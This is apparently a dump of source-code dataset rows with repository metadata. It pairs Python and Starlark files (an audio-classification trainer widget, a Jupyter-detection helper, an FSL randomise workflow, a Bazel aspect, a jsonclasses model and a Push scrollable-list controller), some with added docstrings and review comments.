class AudioClassification(ImageTrainerMixin):
    """Image-classification trainer widget specialized for audio data.

    Audio folders are converted to spectrogram .exr images (via build_dir)
    before being handed to the underlying image training service; the widget
    also previews audio files as playable clips plus spectrogram slices.
    """

    def __init__(  # type: ignore
        self,
        sname: str,
        *,  # unnamed parameters are forbidden
        mllib: str = "caffe",
        engine: Engine = "CUDNN_SINGLE_HANDLE",
        training_repo: Path = None,
        testing_repo: List[Path] = None,
        tmp_dir: Path = None,
        description: str = "classification service",
        model_repo: Path = None,
        host: str = "localhost",
        port: int = 1234,
        path: str = "",
        gpuid: GPUIndex = 0,
        # -- specific
        nclasses: int = -1,
        img_width: Optional[int] = None,
        img_height: Optional[int] = None,
        base_lr: float = 1e-4,
        lr_policy: str = "fixed",
        stepvalue: List[int] = [],
        warmup_lr: float = 1e-5,
        warmup_iter: int = 0,
        iterations: int = 10000,
        snapshot_interval: int = 5000,
        test_interval: int = 1000,
        layers: List[str] = [],
        template: Optional[str] = None,
        activation: Optional[str] = "relu",
        dropout: float = 0.0,
        autoencoder: bool = False,
        mirror: bool = False,
        rotate: bool = False,
        scale: float = 1.0,
        tsplit: float = 0.0,
        finetune: bool = False,
        resume: bool = False,
        bw: bool = False,
        crop_size: int = -1,
        batch_size: int = 32,
        test_batch_size: int = 16,
        iter_size: int = 1,
        solver_type: Solver = "SGD",
        sam : bool = False,
        swa : bool = False,
        lookahead : bool = False,
        lookahead_steps : int = 6,
        lookahead_alpha : float = 0.5,
        rectified : bool = False,
        decoupled_wd_periods : int = 4,
        decoupled_wd_mult : float = 2.0,
        lr_dropout : float = 1.0,
        noise_prob: float = 0.0,
        distort_prob: float = 0.0,
        test_init: bool = False,
        class_weights: List[float] = [],
        weights: Path = None,
        tboard: Optional[Path] = None,
        ignore_label: int = -1,
        multi_label: bool = False,
        regression: bool = False,
        rand_skip: int = 0,
        unchanged_data: bool = False,
        ctc: bool = False,
        target_repository: str = "",
        **kwargs
    ) -> None:
        # all keyword options are forwarded to the mixin via locals()
        super().__init__(sname, locals())

    def _train_service_body(self):
        """Extend the mixin's training request: convert audio folders to .exr
        spectrograms under tmp_dir unless they were already converted, and
        point the service's data paths at the image folders."""
        body = super()._train_service_body()
        tmp_dir = Path(self.tmp_dir.value)
        train_dir = Path(self.training_repo.value)
        test_dir = Path(self.testing_repo.value)
        if not tmp_dir.exists():
            tmp_dir.mkdir(parents=True)
        # any existing .exr files mean the folder already holds spectrograms
        exr_files = glob.glob(train_dir.as_posix() + '/*/*.exr')
        if len(exr_files) == 0:
            build_dir(train_dir, tmp_dir / "train")
            body['data'] = [(tmp_dir / "train").as_posix()]
        else:
            body['data'] = [train_dir.as_posix()]
        if self.testing_repo.value != "":
            exr_files = glob.glob(test_dir.as_posix() + '/*/*.exr')
            if len(exr_files) == 0:
                build_dir(test_dir, tmp_dir / "test")
                # NOTE(review): `+=` with a str extends the list character by
                # character — presumably .append(...) was intended; confirm
                body['data'] += (tmp_dir / "test").as_posix()
            else:
                body['data'] += test_dir.as_posix()
        return body

    def display_img(self, args):
        """Preview newly selected audio files: play each one and show up to
        five spectrogram slices side by side."""
        self.output.clear_output()
        with self.output:
            for filepath in args["new"]:
                display(Audio(filepath, autoplay=True))
                y, sr = librosa.load(filepath)
                D = librosa.stft(y, 2 ** 9, center=True)
                spec = librosa.amplitude_to_db(
                    librosa.magphase(D)[0], ref=np.max
                )
                fig, ax = plt.subplots(1, 5, figsize=(16, 4))
                for i, sl in zip(range(5), make_slice(spec.shape[1], 257, 100)):
                    ax[i].imshow(spec[:, sl])
                # save the figure to a temp PNG so it can be displayed inline
                _, fname = mkstemp(suffix=".png")
                fig.savefig(fname)
                display(Image(fname))
| 5,100 | 24 | 127 |
ed96689ed757d8216e0bf5bc388e12340fe4031c | 662 | py | Python | minifold/ipynb.py | nokia/minifold | 3687d32ab6119dc8293ae370c8c4ba9bbbb47deb | [
"BSD-3-Clause"
] | 15 | 2018-09-03T09:40:59.000Z | 2021-07-16T16:14:46.000Z | src/ipynb.py | Infinite-Blue-1042/minifold | cd0aa9207f9e1819ed2ecbb24373cdcfe27abd16 | [
"BSD-3-Clause"
] | null | null | null | src/ipynb.py | Infinite-Blue-1042/minifold | cd0aa9207f9e1819ed2ecbb24373cdcfe27abd16 | [
"BSD-3-Clause"
] | 8 | 2019-01-25T07:18:59.000Z | 2021-04-07T17:54:54.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# This file is part of the minifold project.
# https://github.com/nokia/minifold
__author__ = "Marc-Olivier Buob"
__maintainer__ = "Marc-Olivier Buob"
__email__ = "marc-olivier.buob@nokia-bell-labs.com"
__copyright__ = "Copyright (C) 2018, Nokia"
__license__ = "BSD-3"
def in_ipynb() -> bool:
    """
    Tests whether the code is running inside a Jupyter Notebook.

    Returns:
        True iff the code is running inside a Jupyter Notebook.
    """
    try:
        shell = get_ipython()
    except NameError:
        # get_ipython only exists inside an IPython/Jupyter session
        return False
    return str(type(shell)) == "<class 'ipykernel.zmqshell.ZMQInteractiveShell'>"
| 27.583333 | 93 | 0.663142 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# This file is part of the minifold project.
# https://github.com/nokia/minifold
__author__ = "Marc-Olivier Buob"
__maintainer__ = "Marc-Olivier Buob"
__email__ = "marc-olivier.buob@nokia-bell-labs.com"
__copyright__ = "Copyright (C) 2018, Nokia"
__license__ = "BSD-3"
def in_ipynb() -> bool:
"""
Tests whether the code is running inside a Jupyter Notebook.
Returns:
True iff the code is running inside a Jupyter Notebook.
"""
try:
return str(type(get_ipython())) == "<class 'ipykernel.zmqshell.ZMQInteractiveShell'>"
except NameError:
return False
| 0 | 0 | 0 |
8a088f9f876fa4e17fcded812bc3abfedb04dd72 | 5,353 | py | Python | CPAC/randomise/randomise.py | tbweng/C-PAC | 12a1807865273891aa3a566429ac9fe76c12532c | [
"BSD-3-Clause"
] | null | null | null | CPAC/randomise/randomise.py | tbweng/C-PAC | 12a1807865273891aa3a566429ac9fe76c12532c | [
"BSD-3-Clause"
] | null | null | null | CPAC/randomise/randomise.py | tbweng/C-PAC | 12a1807865273891aa3a566429ac9fe76c12532c | [
"BSD-3-Clause"
] | null | null | null |
import nipype.pipeline.engine as pe
from CPAC.pipeline.cpac_group_runner import load_config_yml
| 38.510791 | 137 | 0.665608 |
import nipype.pipeline.engine as pe
from CPAC.pipeline.cpac_group_runner import load_config_yml
def select(input_list):
    """Return the first statistic image in *input_list* whose header shows
    positive values (cal_max != 0 while cal_min == 0).

    Images with cal_min == cal_max == 0 are empty (no positive values in the
    unpermuted statistic image) and trigger a warning. Returns None when no
    file qualifies.
    """
    import nibabel as nb
    for path in input_list:
        hdr = nb.load(path).header
        if hdr['cal_min'] == 0 and hdr['cal_max'] == 0:
            # bug fix: the original passed the literal string 'i' to format(),
            # so the warning never named the offending file
            print ("Warning! {} is an empty image because of no positive "
                   "values in the unpermuted statistic image, and it could "
                   "not be processed with tfce.".format(path))
        if not hdr['cal_max'] == 0 and hdr['cal_min'] == 0:
            # (removed dead local `selected_file`, which was never read)
            return path
    return None
def prep_randomise_workflow(c, merged_file, mask_file, f_test, mat_file,
                            con_file, grp_file, output_dir, working_dir,
                            log_dir, model_name, fts_file=None):
    """Build and run a nipype workflow around FSL randomise.

    Runs randomise on *merged_file* within *mask_file* using the design
    (mat/con, optional fts), picks the non-empty t-stat / corrected-p images,
    thresholds at 0.95, clusters the masked result, and sinks everything to
    *output_dir*.

    NOTE(review): f_test, grp_file, working_dir and log_dir are accepted but
    never used (wf.base_dir comes from c.work_dir) — confirm intent.
    """
    import nipype.interfaces.utility as util
    import nipype.interfaces.fsl as fsl
    import nipype.interfaces.io as nio
    wf = pe.Workflow(name='randomise_workflow')
    wf.base_dir = c.work_dir
    randomise = pe.Node(interface=fsl.Randomise(),
                        name='fsl-randomise_{0}'.format(model_name))
    randomise.inputs.base_name = model_name
    randomise.inputs.in_file = merged_file
    randomise.inputs.mask = mask_file
    randomise.inputs.num_perm = c.randomise_permutation
    randomise.inputs.demean = c.randomise_demean
    randomise.inputs.c_thresh = c.randomise_thresh
    randomise.inputs.tfce = c.randomise_tfce
    randomise.inputs.design_mat = mat_file
    randomise.inputs.tcon = con_file
    if fts_file:
        randomise.inputs.fcon = fts_file
    # pick the first non-empty corrected-p image (see select())
    select_tcorrp_files = pe.Node(util.Function(input_names=['input_list'],
                                                output_names=['out_file'],
                                                function=select),
                                  name='select_t_corrp')
    wf.connect(randomise, 't_corrected_p_files', select_tcorrp_files, 'input_list')
    # pick the first non-empty t-stat image
    select_tstat_files = pe.Node(util.Function(input_names=['input_list'],
                                               output_names=['out_file'],
                                               function=select),
                                 name='select_t_stat')
    wf.connect(randomise, 'tstat_files', select_tstat_files, 'input_list')
    thresh = pe.Node(interface=fsl.Threshold(),
                     name='fsl_threshold_contrast')
    thresh.inputs.thresh = 0.95
    thresh.inputs.out_file = 'randomise_pipe_thresh_tstat.nii.gz'
    wf.connect(select_tstat_files, 'out_file', thresh, 'in_file')
    # binarize the thresholded map, then mask the t-stat image with it
    thresh_bin = pe.Node(interface=fsl.UnaryMaths(),
                         name='fsl_threshold_bin_contrast')
    thresh_bin.inputs.operation = 'bin'
    wf.connect(thresh, 'out_file', thresh_bin, 'in_file')
    apply_mask = pe.Node(interface=fsl.ApplyMask(),
                         name='fsl_applymask_contrast')
    wf.connect(select_tstat_files, 'out_file', apply_mask, 'in_file')
    wf.connect(thresh_bin, 'out_file', apply_mask, 'mask_file')
    cluster = pe.Node(interface=fsl.Cluster(),
                      name='cluster_contrast')
    cluster.inputs.threshold = 0.0001
    cluster.inputs.out_index_file = "index_file"
    cluster.inputs.out_localmax_txt_file = "lmax_contrast.txt"
    # NOTE(review): out_size_file is assigned twice (here and below) — the
    # second assignment overwrites the first
    cluster.inputs.out_size_file = "cluster_size_contrast"
    cluster.inputs.out_threshold_file = True
    cluster.inputs.out_max_file = True
    cluster.inputs.out_mean_file = True
    cluster.inputs.out_pval_file = True
    cluster.inputs.out_size_file = True
    wf.connect(apply_mask, 'out_file', cluster, 'in_file')
    ds = pe.Node(nio.DataSink(), name='fsl-randomise_sink')
    ds.inputs.base_directory = str(output_dir)
    ds.inputs.container = ''
    wf.connect(randomise,'tstat_files', ds,'tstat_files')
    wf.connect(randomise,'t_corrected_p_files', ds,'t_corrected_p_files')
    wf.connect(select_tcorrp_files,'out_file', ds,'out_tcorr_corrected')
    wf.connect(select_tstat_files,'out_file', ds,'out_tstat_corrected')
    wf.connect(thresh,'out_file', ds,'randomise_pipe_thresh_tstat.nii.gz')
    wf.connect(thresh_bin,'out_file', ds,'thresh_bin_out')
    wf.connect(cluster,'index_file', ds,'index_file')
    wf.connect(cluster,'threshold_file', ds,'threshold_file')
    wf.connect(cluster,'localmax_txt_file', ds,'localmax_txt_file')
    wf.connect(cluster,'localmax_vol_file', ds,'localmax_vol_file')
    wf.connect(cluster,'max_file', ds,'max_file')
    # NOTE(review): 'meal_file' looks like a typo for 'mean_file' — confirm
    wf.connect(cluster,'mean_file', ds,'meal_file')
    wf.connect(cluster,'pval_file', ds,'pval_file')
    wf.connect(cluster,'size_file', ds,'size_file')
    wf.run()
def run(group_config_path):
    """Load a group-level config and launch the randomise workflow over the
    configured participant list (or every subdirectory of the pipeline output
    folder when no list is given).

    NOTE(review): `commands` is a Python 2-only module, and the call below
    passes crash_dir= which prep_randomise_workflow does not accept; the
    randomise_merged_file/randomise_merged_mask helpers are also not defined
    in this module — confirm this entry point is current.
    """
    import re
    import commands
    commands.getoutput('source ~/.bashrc')
    import os
    import sys
    import pickle
    import yaml
    group_config_obj = load_config_yml(group_config_path)
    pipeline_output_folder = group_config_obj.pipeline_dir
    if not group_config_obj.participant_list == None:
        s_paths = group_config_obj.participant_list
    else:
        s_paths = [x for x in os.listdir(pipeline_output_folder) if os.path.isdir(x)]
    merged_file = randomise_merged_file(s_paths)
    out_file = randomise_merged_mask(s_paths)
    prep_randomise_workflow(group_config_obj, merged_file=merged_file,mask_file=out_file,working_dir=None,output_dir=None,crash_dir=None)
| 5,183 | 0 | 69 |
6741da8a9b36218872414ff33253005a1ce3fbdc | 362 | bzl | Python | rules/jvm.bzl | tjarvstrand/rules_scala | ff423d8bdd0e5383f8f2c048ffd7704bb51a91bf | [
"Apache-2.0"
] | 53 | 2019-01-07T23:15:32.000Z | 2021-09-24T00:27:40.000Z | rules/jvm.bzl | tjarvstrand/rules_scala | ff423d8bdd0e5383f8f2c048ffd7704bb51a91bf | [
"Apache-2.0"
] | 101 | 2019-01-05T04:52:40.000Z | 2021-01-29T16:48:58.000Z | rules/jvm.bzl | tjarvstrand/rules_scala | ff423d8bdd0e5383f8f2c048ffd7704bb51a91bf | [
"Apache-2.0"
] | 24 | 2019-01-23T07:54:28.000Z | 2022-02-10T19:42:07.000Z | load("//rules/jvm:private/label.bzl", _labeled_jars_implementation = "labeled_jars_implementation")
# For bedtime reading:
# https://github.com/bazelbuild/bazel/issues/4584
# https://groups.google.com/forum/#!topic/bazel-discuss/mt2llfwzmac
labeled_jars = aspect(
implementation = _labeled_jars_implementation,
attr_aspects = ["deps"], # assumption
)
| 32.909091 | 99 | 0.765193 | load("//rules/jvm:private/label.bzl", _labeled_jars_implementation = "labeled_jars_implementation")
# For bedtime reading:
# https://github.com/bazelbuild/bazel/issues/4584
# https://groups.google.com/forum/#!topic/bazel-discuss/mt2llfwzmac
# Aspect that is propagated along each target's `deps` edges (attr_aspects),
# running _labeled_jars_implementation (from private/label.bzl) on every
# transitive dependency — presumably to associate jar outputs with their
# owning labels; see the loaded implementation for the exact provider.
labeled_jars = aspect(
    implementation = _labeled_jars_implementation,
    attr_aspects = ["deps"], # assumption
)
| 0 | 0 | 0 |
e5310cbec155ea0ade26865aac5fe549b87cf496 | 290 | py | Python | tests/classes/simple_auth_code.py | Jesse-Yung/jsonclasses | d40c52aec42bcb978a80ceb98b93ab38134dc790 | [
"MIT"
] | 50 | 2021-08-18T08:08:04.000Z | 2022-03-20T07:23:26.000Z | tests/classes/simple_auth_code.py | Jesse-Yung/jsonclasses | d40c52aec42bcb978a80ceb98b93ab38134dc790 | [
"MIT"
] | 1 | 2021-02-21T03:18:09.000Z | 2021-03-08T01:07:52.000Z | tests/classes/simple_auth_code.py | Jesse-Yung/jsonclasses | d40c52aec42bcb978a80ceb98b93ab38134dc790 | [
"MIT"
] | 8 | 2021-07-01T02:39:15.000Z | 2021-12-10T02:20:18.000Z | from __future__ import annotations
from typing import Optional
from jsonclasses import jsonclass, types
@jsonclass
| 26.363636 | 71 | 0.77931 | from __future__ import annotations
from typing import Optional
from jsonclasses import jsonclass, types
@jsonclass
class SimpleAuthCode:
    """A jsonclasses model for an auth code optionally tied to a phone number."""
    # Country calling code; `presentwith('phone_number')` ties its validity to
    # phone_number being set — confirm exact rule semantics in jsonclasses docs.
    calling_code: Optional[str] = types.str.presentwith('phone_number')
    # Phone number the code relates to (optional).
    phone_number: Optional[str] = types.str
    # The auth code itself; required for the object to validate.
    code: str = types.str.required
| 0 | 151 | 22 |
16d294a6ffd5136b2ca8795b8d0d9efff3e2c7c0 | 17,534 | py | Python | APC400000/ScrollableList.py | martinpechmann/APC400000 | 0783dd2f7c3846684f785b15e651c61edf95e27c | [
"BSD-Source-Code"
] | 6 | 2019-09-15T18:46:49.000Z | 2021-09-10T06:36:10.000Z | APC400000/ScrollableList.py | martinpechmann/APC400000 | 0783dd2f7c3846684f785b15e651c61edf95e27c | [
"BSD-Source-Code"
] | 3 | 2015-06-14T22:47:01.000Z | 2015-06-17T14:24:47.000Z | APC400000/ScrollableList.py | martinpechmann/APC400000 | 0783dd2f7c3846684f785b15e651c61edf95e27c | [
"BSD-Source-Code"
] | 1 | 2016-12-21T12:18:14.000Z | 2016-12-21T12:18:14.000Z | # Embedded file name: c:\Jenkins\live\output\win_32_static\Release\midi-remote-scripts\Push\ScrollableList.py
from __future__ import with_statement
from functools import partial
from _Framework.Control import ButtonControl, EncoderControl, control_list
from _Framework.CompoundComponent import CompoundComponent
from _Framework.Util import forward_property, in_range, clamp, BooleanContext, index_if
from _Framework.SubjectSlot import subject_slot, Subject
from _Framework import Task, Defaults
from _Framework.ScrollComponent import ScrollComponent, Scrollable
import consts
class ScrollableListItem(object):
"""
Wrapper of an item of a scrollable list.
"""
@property
@property
@property
@property
class ScrollableList(Subject, Scrollable):
"""
Class for managing a visual subset of a list of items.
The items will be wrapped in an item_type instance.
"""
__subject_events__ = ('selected_item', 'item_activated', 'scroll')
item_type = ScrollableListItem
fixed_offset = None
@property
num_visible_items = property(_get_num_visible_items, _set_num_visible_items)
@property
def select_item_index_with_offset(self, index, offset):
"""
Selects an item index but moves the view such that there are,
if possible, 'offset' number of elements visible before the
selected one. Does nothing if the item was already selected.
"""
if not (index != self.selected_item_index and index >= 0 and index < len(self._items) and self.selected_item_index != -1):
raise AssertionError
self._offset = clamp(index - offset, 0, len(self._items))
self._normalize_offset(index)
self._do_set_selected_item_index(index)
def select_item_index_with_border(self, index, border_size):
"""
Selects an item with an index. Moves the view if the selection would exceed the
border of the current view.
"""
if self.fixed_offset is not None:
self.select_item_index_with_offset(index, self.fixed_offset)
elif index >= 0 and index < len(self._items):
if not in_range(index, self._offset + border_size, self._offset + self._num_visible_items - border_size):
offset = index - (self._num_visible_items - 2 * border_size) if self.selected_item_index < index else index - border_size
self._offset = clamp(offset, 0, len(self._items))
self._normalize_offset(index)
self._do_set_selected_item_index(index)
return
selected_item_index = property(_get_selected_item_index, _set_selected_item_index)
@property
@property
class ActionListItem(ScrollableListItem):
"""
Interface for an list element that can be actuated on.
"""
supports_action = False
class ActionList(ScrollableList):
"""
A scrollable list of items that can be actuated on.
"""
item_type = ActionListItem
class DefaultItemFormatter(object):
"""
Item formatter that will indicate selection and show action_message if the item
is currently performing an action
"""
action_message = 'Loading...'
class ListComponent(CompoundComponent):
"""
Component that handles a ScrollableList. If an action button is
passed, it can handle an ActionList.
"""
__subject_events__ = ('item_action',)
SELECTION_DELAY = 0.5
ENCODER_FACTOR = 10.0
empty_list_message = ''
_current_action_item = None
_last_action_item = None
action_button = ButtonControl(color='Browser.Load')
encoders = control_list(EncoderControl)
@property
scrollable_list = property(_get_scrollable_list, _set_scrollable_list)
select_next_button = forward_property('_scroller')('scroll_down_button')
select_prev_button = forward_property('_scroller')('scroll_up_button')
next_page_button = forward_property('_pager')('scroll_down_button')
prev_page_button = forward_property('_pager')('scroll_up_button')
@subject_slot('scroll')
@subject_slot('selected_item')
@encoders.value
@action_button.pressed
def _execute_action(self):
""" Is called by the execute action task and should not be called directly
use _trigger_action instead """
if self._current_action_item != None:
self.do_trigger_action(self._current_action_item)
self._last_action_item = self._current_action_item
self._current_action_item = None
self.update()
return
@property
@property | 39.940774 | 162 | 0.678853 | # Embedded file name: c:\Jenkins\live\output\win_32_static\Release\midi-remote-scripts\Push\ScrollableList.py
from __future__ import with_statement
from functools import partial
from _Framework.Control import ButtonControl, EncoderControl, control_list
from _Framework.CompoundComponent import CompoundComponent
from _Framework.Util import forward_property, in_range, clamp, BooleanContext, index_if
from _Framework.SubjectSlot import subject_slot, Subject
from _Framework import Task, Defaults
from _Framework.ScrollComponent import ScrollComponent, Scrollable
import consts
class ScrollableListItem(object):
    """
    Wraps a single entry of a ScrollableList, remembering the raw entry,
    its position, and the list that owns it (if any).
    """

    def __init__(self, index = None, content = None, scrollable_list = None, *a, **k):
        super(ScrollableListItem, self).__init__(*a, **k)
        self._index = index
        self._content = content
        self._scrollable_list = scrollable_list

    def __str__(self):
        return unicode(self._content)

    @property
    def content(self):
        # The wrapped raw entry.
        return self._content

    @property
    def index(self):
        # Position of this entry inside the owning list.
        return self._index

    @property
    def container(self):
        # The owning ScrollableList, or None when detached.
        return self._scrollable_list

    @property
    def is_selected(self):
        owner = self._scrollable_list
        return owner and owner.is_selected(self)

    def select(self):
        owner = self._scrollable_list
        return owner and owner.select_item(self)
class ScrollableList(Subject, Scrollable):
    """
    Class for managing a visual subset of a list of items.
    The items will be wrapped in an item_type instance.
    """
    __subject_events__ = ('selected_item', 'item_activated', 'scroll')
    # Wrapper class applied to every raw entry; subclasses may override.
    item_type = ScrollableListItem
    # When not None, select_item_index_with_border keeps this fixed number of
    # items visible before the selection instead of using the border logic.
    fixed_offset = None
    def __init__(self, num_visible_items = 1, item_type = None, *a, **k):
        super(ScrollableList, self).__init__(*a, **k)
        if item_type != None:
            self.item_type = item_type
        self._items = []
        self._num_visible_items = num_visible_items
        # -1 means "no selection" (empty list).
        self._selected_item_index = -1
        self._last_activated_item_index = None
        # Index of the first visible item (top of the view window).
        self._offset = 0
        # Secondary Scrollable that moves page-wise instead of item-wise.
        self._pager = Scrollable()
        self._pager.scroll_up = self.prev_page
        self._pager.scroll_down = self.next_page
        self._pager.can_scroll_up = self.can_scroll_up
        self._pager.can_scroll_down = self.can_scroll_down
        return
    @property
    def pager(self):
        return self._pager
    def scroll_up(self):
        # Move the selection one item up, keeping a 1-item border visible.
        if self.can_scroll_up():
            self.select_item_index_with_border(self.selected_item_index - 1, 1)
            self.notify_scroll()
    def can_scroll_up(self):
        return self._selected_item_index > 0
    def scroll_down(self):
        # Move the selection one item down, keeping a 1-item border visible.
        if self.can_scroll_down():
            self.select_item_index_with_border(self.selected_item_index + 1, 1)
            self.notify_scroll()
    def can_scroll_down(self):
        return self._selected_item_index < len(self._items) - 1
    def _get_num_visible_items(self):
        return self._num_visible_items
    def _set_num_visible_items(self, num_items):
        if not num_items >= 0: raise AssertionError
        self._num_visible_items = num_items
        # Resizing the window may require shifting it to keep the selection visible.
        self._normalize_offset(self._selected_item_index)
    num_visible_items = property(_get_num_visible_items, _set_num_visible_items)
    @property
    def visible_items(self):
        # The slice of wrapped items currently inside the view window.
        return self.items[self._offset:self._offset + self._num_visible_items]
    def select_item_index_with_offset(self, index, offset):
        """
        Selects an item index but moves the view such that there are,
        if possible, 'offset' number of elements visible before the
        selected one. Does nothing if the item was already selected.
        """
        if not (index != self.selected_item_index and index >= 0 and index < len(self._items) and self.selected_item_index != -1):
            raise AssertionError
        # Place the window so `offset` items precede the selection, then
        # normalize so the window stays inside the list bounds.
        self._offset = clamp(index - offset, 0, len(self._items))
        self._normalize_offset(index)
        self._do_set_selected_item_index(index)
    def select_item_index_with_border(self, index, border_size):
        """
        Selects an item with an index. Moves the view if the selection would exceed the
        border of the current view.
        """
        if self.fixed_offset is not None:
            self.select_item_index_with_offset(index, self.fixed_offset)
        elif index >= 0 and index < len(self._items):
            # Only move the window when the new selection falls outside the
            # border zone of the current view.
            if not in_range(index, self._offset + border_size, self._offset + self._num_visible_items - border_size):
                offset = index - (self._num_visible_items - 2 * border_size) if self.selected_item_index < index else index - border_size
                self._offset = clamp(offset, 0, len(self._items))
                self._normalize_offset(index)
            self._do_set_selected_item_index(index)
        return
    def next_page(self):
        # NOTE: '/' is integer division here — this file targets Python 2.
        if self.can_scroll_down():
            current_page = self.selected_item_index / self.num_visible_items
            last_page_index = len(self.items) - self.num_visible_items
            if self.selected_item_index < last_page_index:
                index = clamp((current_page + 1) * self.num_visible_items, 0, len(self.items) - self.num_visible_items)
            else:
                # Already on the last page: jump to the very last item.
                index = len(self.items) - 1
            self.select_item_index_with_offset(index, 0)
    def prev_page(self):
        if self.can_scroll_up():
            current_page = self.selected_item_index / self.num_visible_items
            last_page_index = len(self.items) - self.num_visible_items
            if self.selected_item_index <= last_page_index:
                index = clamp((current_page - 1) * self.num_visible_items, 0, len(self.items) - self.num_visible_items)
            else:
                index = max(len(self.items) - self.num_visible_items, 0)
            self.select_item_index_with_offset(index, 0)
    def _set_selected_item_index(self, index):
        if not (index >= 0 and index < len(self._items) and self.selected_item_index != -1):
            raise AssertionError
        self._normalize_offset(index)
        self._do_set_selected_item_index(index)
    def _get_selected_item_index(self):
        return self._selected_item_index
    selected_item_index = property(_get_selected_item_index, _set_selected_item_index)
    def _normalize_offset(self, index):
        # Shift the view window so `index` is inside it, then clamp the window
        # to the list bounds.
        if index >= 0:
            if index >= self._offset + self._num_visible_items:
                self._offset = index - (self._num_visible_items - 1)
            elif index < self._offset:
                self._offset = index
            self._offset = clamp(self._offset, 0, len(self._items) - self._num_visible_items)
    @property
    def selected_item(self):
        return self._items[self.selected_item_index] if in_range(self._selected_item_index, 0, len(self._items)) else None
    @property
    def items(self):
        return self._items
    def assign_items(self, items):
        # Re-wrap the raw entries, trying to keep the previous selection by
        # comparing the items' string representations.
        old_selection = unicode(self.selected_item)
        for item in self._items:
            item._scrollable_list = None
        self._items = tuple([ self.item_type(index=index, content=item, scrollable_list=self) for index, item in enumerate(items) ])
        if self._items:
            new_selection = index_if(lambda item: unicode(item) == old_selection, self._items)
            # Fall back to index 0 when no item matches the old selection
            # (index_if presumably returns an out-of-range value then — confirm).
            self._selected_item_index = new_selection if in_range(new_selection, 0, len(self._items)) else 0
            self._normalize_offset(self._selected_item_index)
        else:
            self._offset = 0
            self._selected_item_index = -1
        self._last_activated_item_index = None
        self.notify_selected_item()
        self.request_notify_item_activated()
        return
    def select_item(self, item):
        self.selected_item_index = item.index
    def is_selected(self, item):
        return item and item.index == self.selected_item_index
    def request_notify_item_activated(self):
        # Fire item_activated only when the activated index actually changed.
        if self._selected_item_index != self._last_activated_item_index:
            self._last_activated_item_index = self._selected_item_index
            self.notify_item_activated()
    def _do_set_selected_item_index(self, index):
        if index != self._selected_item_index:
            self._selected_item_index = index
            self.notify_selected_item()
class ActionListItem(ScrollableListItem):
    """
    A ScrollableListItem that may additionally carry an action.

    Subclasses flip supports_action to True and override action() with the
    actual behaviour; the base implementation does nothing.
    """
    supports_action = False

    def action(self):
        return None
class ActionList(ScrollableList):
    """
    A scrollable list of items that can be actuated on.
    """
    # Wrap raw entries in ActionListItem instead of the plain wrapper, so
    # every item exposes the supports_action/action() interface.
    item_type = ActionListItem
class DefaultItemFormatter(object):
    """
    Default display formatter: prefixes the selection marker and shows
    action_message instead of the item text while the item is performing
    an action. Returns the empty string for a missing item.
    """
    action_message = 'Loading...'

    def __call__(self, index, item, action_in_progress):
        if not item:
            return ''
        marker = consts.CHAR_SELECT if item.is_selected else ' '
        body = self.action_message if action_in_progress else unicode(item)
        return marker + body
class ListComponent(CompoundComponent):
    """
    Component that handles a ScrollableList. If an action button is
    passed, it can handle an ActionList.
    """
    __subject_events__ = ('item_action',)
    # Seconds to wait before reporting an item as "activated" after selection.
    SELECTION_DELAY = 0.5
    # Scale factor applied to raw encoder deltas when selecting via encoder.
    ENCODER_FACTOR = 10.0
    empty_list_message = ''
    # Item whose action is pending / the last item whose action ran.
    _current_action_item = None
    _last_action_item = None
    action_button = ButtonControl(color='Browser.Load')
    encoders = control_list(EncoderControl)
    def __init__(self, scrollable_list = None, data_sources = tuple(), *a, **k):
        super(ListComponent, self).__init__(*a, **k)
        self._data_sources = data_sources
        # Placeholder tasks; replaced with real ones when scheduling below.
        self._activation_task = Task.Task()
        self._action_on_scroll_task = Task.Task()
        self._scrollable_list = None
        self._scroller = self.register_component(ScrollComponent())
        self._pager = self.register_component(ScrollComponent())
        self.last_action_item = lambda : self._last_action_item
        self.item_formatter = DefaultItemFormatter()
        for c in (self._scroller, self._pager):
            for button in (c.scroll_up_button, c.scroll_down_button):
                button.color = 'List.ScrollerOn'
                button.pressed_color = None
                button.disabled_color = 'List.ScrollerOff'
        if scrollable_list == None:
            self.scrollable_list = ActionList(num_visible_items=len(data_sources))
        else:
            self.scrollable_list = scrollable_list
            self._scrollable_list.num_visible_items = len(data_sources)
        self._delay_activation = BooleanContext()
        self._selected_index_float = 0.0
        self._in_encoder_selection = BooleanContext(False)
        # Deferred one-tick task that actually runs the pending action.
        self._execute_action_task = self._tasks.add(Task.sequence(Task.delay(1), Task.run(self._execute_action)))
        self._execute_action_task.kill()
        return
    @property
    def _trigger_action_on_scrolling(self):
        # Holding the action button while scrolling triggers actions on the fly.
        return self.action_button.is_pressed
    def _get_scrollable_list(self):
        return self._scrollable_list
    def _set_scrollable_list(self, new_list):
        if new_list != self._scrollable_list:
            self._scrollable_list = new_list
            if new_list != None:
                new_list.num_visible_items = len(self._data_sources)
                self._scroller.scrollable = new_list
                self._pager.scrollable = new_list.pager
                self._on_scroll.subject = new_list
                self._selected_index_float = new_list.selected_item_index
            else:
                self._scroller.scrollable = ScrollComponent.default_scrollable
                # NOTE(review): this assigns default_pager to _scroller again;
                # it looks like `self._pager.scrollable = ...` was intended — confirm.
                self._scroller.scrollable = ScrollComponent.default_pager
            self._on_selected_item_changed.subject = new_list
            self.update_all()
        return
    scrollable_list = property(_get_scrollable_list, _set_scrollable_list)
    def set_data_sources(self, sources):
        # One display data source per visible row.
        self._data_sources = sources
        if self._scrollable_list:
            self._scrollable_list.num_visible_items = len(sources)
        self._update_display()
    select_next_button = forward_property('_scroller')('scroll_down_button')
    select_prev_button = forward_property('_scroller')('scroll_up_button')
    next_page_button = forward_property('_pager')('scroll_down_button')
    prev_page_button = forward_property('_pager')('scroll_up_button')
    def on_enabled_changed(self):
        super(ListComponent, self).on_enabled_changed()
        if not self.is_enabled():
            self._execute_action_task.kill()
    @subject_slot('scroll')
    def _on_scroll(self):
        # While the action button is held, schedule an action on the item the
        # scrolling lands on (after a short momentary delay).
        if self._trigger_action_on_scrolling:
            trigger_selected = partial(self._trigger_action, self.selected_item)
            self._action_on_scroll_task.kill()
            self._action_on_scroll_task = self._tasks.add(Task.sequence(Task.wait(Defaults.MOMENTARY_DELAY), Task.delay(1), Task.run(trigger_selected)))
    @subject_slot('selected_item')
    def _on_selected_item_changed(self):
        self._scroller.update()
        self._pager.update()
        self._update_display()
        self._update_action_feedback()
        self._activation_task.kill()
        self._action_on_scroll_task.kill()
